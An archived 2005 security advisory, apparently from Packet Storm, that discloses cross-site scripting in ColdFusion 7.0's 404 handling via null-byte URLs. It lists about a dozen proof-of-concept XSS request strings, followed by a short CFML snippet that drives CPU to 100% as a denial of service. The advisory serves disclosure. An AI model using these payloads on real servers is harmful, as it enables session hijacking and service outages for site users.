what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Macromedia_Coldfusion_7.0.txt

Macromedia_Coldfusion_7.0.txt
Posted Jun 1, 2005
Authored by Dr. Insane

A vulnerability exists in Macromedia ColdFusion 7.0 which allows a remote attacker to execute arbitrary HTML and script code to a users browser session.

tags | advisory, remote, arbitrary
SHA-256 | b7e5adbb8cca2e19fa11f114f83ccae2400d714542e19d777713e7dbe4d4ba6f

Macromedia_Coldfusion_7.0.txt

Change Mirror Download
Macromedia Coldfusion MX 7.0 Security Advisory

21 April 2005

Remote Vulnerabilities in Macromedia ColdFusion cfm files




Synopsis:
Dr_insane has discovered some remote vulnerabilities in Macromedia ColdFusion 7.0.ColdFusion is an enterprise
application used to develop, maintain, administer, and deliver Web sites
on the Internet.The vulnerabilities allow a remote attacker to execute arbitrary HTML and script code in a user's
browser session in context of a vulnerable site as well as to perform some denial of service attacks.



Affected Systems:
ColdFusion Server for Windows 7.0



Description:
Three years ago a similar vulnerability had surfaced in ColdFusion Server version 6.0.0.46617. The problem
was that Macromedia's ColdFusion MX comes with a default 404 error page.This 404 error page presents
the path of the file requested, and was not filtering it for hazardous characters,
which could be used for a cross site scripting attack. eg.
http://CF_MX_SERVER/<script>alert(document.cookie)</script>.cfm
This bug has been fixed in version 7.0 but it is still possible using some malformed url to conduct such
kind of attacks.
This time in order to perform the attack you must request from the server a non-existence CFM file
following by a %00 and the script code you want to execute.



Examples:
http://127.0.0.1:8500/../../../../../../../.cfm.%00<A%20HREF=http://www.microsoft.com>Microsoft%20Site
http://127.0.0.1:8500/.cfm%00<IMG%20SRC="http://www.google.co.uk/intl/en_uk/images/logo.gif">
http://127.0.0.1:8500/.cfm%00<IMG%20SRC="javascript:alert('haked')"
http://127.0.0.1:8500/.cfm%00<XML%20SRC="javascript:alert('XSS');">
http://127.0.0.1:8500/.cfm%00<STYLE%20type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
http://127.0.0.1:8500/.cfm%00<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
http://127.0.0.1:8500/.cfm%00<TABLE%20BACKGROUND="javascript:alert('XSS')">
http://127.0.0.1:8500/.cfm%00<IFRAME%20SRC=javascript:alert('XSS')></IFRAME>
http://127.0.0.1:8500/.cfm%00<BODY%20ONLOAD=alert('XSS')>
http://127.0.0.1:8500/.cfm%00<IMG%20SRC="jav&#x0D;ascript:alert('XSS');">
http://127.0.0.1:8500/.cfm%00<IMG%20SRC=JaVaScRiPt:alert("XSS")>

Another variation of the above is:

http://127.0.0.1:8500/<BODY%20ONLOAD=alert('XSS')>.cfm

it seems that that the "three years ago bug" has not fully fixed.....



---
In addition to this another possible vulnerability found that may allow an attacker who
can upload files to a Coldfusion server to perform some denial of service attacks.
By uploading a cfm file with arbitary content of 3 Mb about
and run it CPU usage will hit 100% for some minutes. A similar vulnerability have been found some time ago it was fixed.
Tha exploitation code for that vulnerabity was and :
**Start of code**
<cfset
longstr = RepeatString("1234567890123456789012345678901234567890", 10000)
>
<cfset the_date = #DateFormat(longstr)#>
<cfoutput>#the_date#</cfoutput>
**End of code**




Credit:
Dr_insane
dr_insane@pathfinder.gr



Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    0 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close